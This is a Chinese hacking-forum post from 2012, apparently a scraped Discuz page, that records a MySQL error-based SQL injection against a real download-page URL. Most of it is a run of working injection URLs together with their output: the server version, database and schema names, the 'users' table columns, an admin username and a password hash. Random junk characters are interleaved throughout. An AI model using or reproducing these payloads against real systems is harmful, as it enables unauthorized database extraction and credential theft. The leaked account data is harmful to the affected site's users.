找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
返回列表 发新帖
查看: 2410|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
; M: T1 S: c- e( l& ?, W# }: f6 }: k' U; y
之前想找个测试 没想到这有 可以测试下做个记录而已
) e2 i5 D6 A9 d! A# g7 j: R9 B7 Z1 B$ C( @, h2 g4 R
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0031 i5 X) {, M% A9 H  d( t! t

0 b+ o. Z' K5 \. M/data0/htdocs/leqi_new/app/myapp.php9 u! E# H! Y" _- b1 S

$ W9 E' q6 d# F0 @( I; N) W! l7 a 或者
2 \2 {) S8 @- l, a( ?4 W$ w
6 ^2 ?2 v  a( S5 |( V( L. Q. E/**********version()**********/ 5.1.49-log
/ V* R; x. F, q( j9 S3 Y$ |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 k* v1 S' m% q- ]% [7 H: U6 `- t2 ]5 O
/**********user()**********/  
" z; @' u2 f# ]# g9 G5 c  i# ?1 V6 Ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 Y3 n- Q% @- ^3 z6 o$ F0 O+ ?! N
/**********database()**********/  leqi
% e/ V% K% b* E" z; Q: v  chttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* y8 V* Y; ?0 X2 c; |' y" J2 A5 ^$ ]+ s( h
/**********limit依次递归爆库**********/( M+ n6 Z# f" n3 e
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* |( [; s$ J6 K7 Rinformation_schema+ i# w  G# ?+ ~2 V! w3 u: q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 _! l8 j9 Q( C; A7 i4 ?( p
leqi' @1 f) Z7 c# a! b! T4 U
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 {3 Q7 m* X% B" S$ `( W% ~/ Gtest
9 v' a  C& Z6 R6 \* \( a" ^/ `
+ ~' u1 o; q. ]3 v  b# e/**********limit依次递归爆表名**********/+ f9 E) B0 Q! M1 ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* H# W8 K, r; H+ N7 gusers
, p5 c. E- Z& o
0 H; y6 @! }5 _) }  ]" N/**********limit依次递归爆字段名**********/
+ K" E3 S+ ?  V& H! u) d/ ]/ A& ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 Z8 R! S; B! i1 @* o
user_id,username,nickname,passwd,group_id7 ?! R6 l" Q1 P6 j, @/ g/ [  o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23% l; j9 f, y5 `8 h. e. n
/wapc/5000_0005_003" e6 @+ N, E; a5 ]' K
11 21
; _* V* g; b* b5 T, E+ t, bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
8 X* O0 }; e2 a( I2 i/wapc/5000_0005_0032 r# `& W' v7 I8 y* k/ h3 B/ c5 {
11 341 351 361
5 l( B3 ?8 I% a# t# K/**********爆数据**********/0 r7 x" t1 K- ]0 B( \
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
4 X  V$ c. r9 M9 ~3 ^+ s& U7 Iadmin# D" q7 K" K! t3 z- p* Y+ ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
) q, A" E3 r6 Y2 c; `7 m9 a6a8b4574ca231eb8bd52764d4978ffcd  S' b% i4 P8 t7 x; u! I

0 [) J7 d0 d+ A/ V% a1 H( W # w: ^4 [# \# K" [- n
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表